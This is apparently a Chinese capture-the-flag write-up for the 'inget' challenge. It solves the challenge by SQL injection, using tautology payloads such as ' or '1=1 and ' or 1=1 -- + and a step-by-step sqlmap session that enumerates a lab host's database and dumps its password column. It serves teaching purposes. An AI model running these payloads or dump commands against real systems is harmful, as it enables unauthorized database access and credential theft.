攻防世界14-inget

简介: 攻防世界14-inget

14-inget

方法1:使用hackbar进行sql手工注入

右键检查,进入到hackbar界面,点击load将链接添加进来,而后使用万能用户名进行注入

尝试一下万能密码,使用逻辑语句使结果返回,构造payload

比如理解 /?id=' or ''='

传入到后台就是'id=1' or "=" 前两个单引号形成一个闭合,后面的双引号可以理解为单引号引着单引号,就可以理解为单引号等于单引号

界面就可以看到flag,注意,添加的万能用户名之前要有?id=


方法2:借助sqlmap

1.安装sqlmap

先下载sqlmap,网址:sqlmap: automatic SQL injection and database takeover tool 注意这个网址科学上网打开更快

windows下使用sqlmap

该工具的使用需要有python环境,所以需要将下载好的sqlmap包放到python的文件夹下

在电脑桌面上右键,新建-新建快捷方式

输入cmd

改名为sqlmap,而后右键属性,进入更改起始位置为放sqlmap的位置

双击进入该快捷方式,输入:python sqlmap.py -h 查看是否安装成功,有如下显示就是已经安装成功

一步一步的查询

1.先用sqlmap大概检查一下:

python sqlmap.py -u "http://61.147.171.105:49744/index.php?id=1"

2.尝试列出所有的库

python sqlmap.py -u "http://61.147.171.105:49744/index.php?id=1" --dbs

可以看到有一个名为cyber的数据库,我们指定列出该数据库中的表


python sqlmap.py -u "http://61.147.171.105:49744/index.php?id=1" -D cyber --tables


可以看到这个数据库里只有一个表,且和数据库同名,我们继续列出指定表的字段

python sqlmap.py -u "http://61.147.171.105:49744/index.php?id=1" -D cyber -T cyber --columns

一般情况下内容都是在pw中,尝试获取指定字段pw中的数据,-C 选择使用哪个列

python sqlmap.py -u "http://61.147.171.105:49744/index.php?id=1" -D cyber -T cyber -C pw --dump

常用术语

-D 选择使用哪个数据库

-T 选择使用哪个表

-C 选择使用哪个列

--tables 列出当前的表

--columns 列出当前的列

--dump 获取字段中的数据

kali下使用sqlmap

首先你需要安装vm用于安装kali,而后需要安装kali镜像,具体的安装办法,可以查看我的其他文章


kali里面已经安装好了python环境,我们将sqlmap的文件夹粘贴到桌面上,并进入到该文件夹下


而后执行命令:python3 sqlmap.py -u "http://61.147.171.105:49361/index.php?id=1" -T cyber --dump (注意这里是python3)


知识点:sql注入

先来看为什么手工注入可以显示出flag,尝试的万能密码

/?id='or "='


我们以get的方式在前给id进行传值,后端会对我们传入的数值进行查询,如何查询?


比如我们传入id=123,那么后端就会是'id=123',以单引号闭合的方式进行闭合.


当我们传入?/id=' or "=' 的时候,到后端就是'id=' or "="


对于我们传入的四个单引号的解释:


第一个单引号,与查询时前面的单引号形成闭合;


第二个单引号,与查询时后面的单引号形成闭合;


第三和第四个单引号实际上只是使等号成立的内容,即'='


我们知道or的两边只要有一边成立,结果就为真,而 单引号=单引号 这个肯定是恒成立的


/?id=' or '1=1


换成1的意思就是 1=1,显然是成立的


/?id=' or 1 = 1 -- +


第一个单引号同样是与查询时前面的单引号形成闭合,而 --+ 起注释作用,将后面的语句注释掉


相关文章
|
7月前
|
安全 网络协议 网络安全
网安面试指南——(渗透,攻击,防御)
网安面试指南——(渗透,攻击,防御)
178 2
|
7月前
|
安全 网络安全 数据安全/隐私保护
网络安全与信息安全:防护之道与攻防之策
【5月更文挑战第29天】在数字化时代,网络安全与信息安全已成为维护个人隐私、企业资产和国家安全的重要屏障。本文深入探讨了网络安全漏洞的成因、加密技术的应用以及提升安全意识的必要性,旨在为读者提供一个全面的安全防护知识框架。通过对当前网络威胁的分析,我们揭示了安全漏洞的本质及其对信息系统的潜在影响,并介绍了最新的加密技术如何作为防御工具来保护数据传输的安全。此外,文章还强调了培养全民网络安全意识的重要性,提出了一系列实用的安全建议和最佳实践。
|
7月前
|
SQL 安全 算法
网络安全与信息安全:防护之道与攻防之术
【5月更文挑战第29天】 在数字化时代,数据成为了新的石油。然而,随之而来的网络威胁却如同无形的盗贼,时刻觊觎着这些价值连城的“黑金”。本文将深入探讨网络安全漏洞的本质、加密技术的进展,以及提升安全意识的重要性。我们将透过技术的视角,分析如何构建一道坚固的数字防线,并讨论攻防双方的策略变化。通过案例剖析和最新研究成果,本文旨在为读者提供一份全面的网络安全与信息安全知识图谱。
|
7月前
|
安全 PHP 数据安全/隐私保护
攻防世界17.fileinclude
攻防世界17.fileinclude
|
7月前
|
PHP
攻防世界18.fileclude
攻防世界18.fileclude
|
7月前
|
监控 安全 网络安全
网络安全与信息安全:防范之道与攻防之策
【5月更文挑战第29天】在数字时代,网络安全和信息安全是维护信息完整性、确保数据流通安全的关键。本文深入探讨了网络安全漏洞的产生机理及其影响,分析了加密技术的种类和作用,同时强调了提升个人和企业的安全意识在构建安全防线中的重要性。通过综合技术性措施与行为教育,我们旨在提供一套全面的信息安全防护策略。
|
7月前
【攻防世界】warmup (代码审计)
【攻防世界】warmup (代码审计)
【攻防世界】warmup (代码审计)
|
7月前
|
存储 安全 数据安全/隐私保护
【攻防世界】catcat-new
【攻防世界】catcat-new
|
SQL 数据库
攻防世界-fakebook
攻防世界-fakebook
66 0
攻防世界 Mysterious
攻防世界 Mysterious
66 0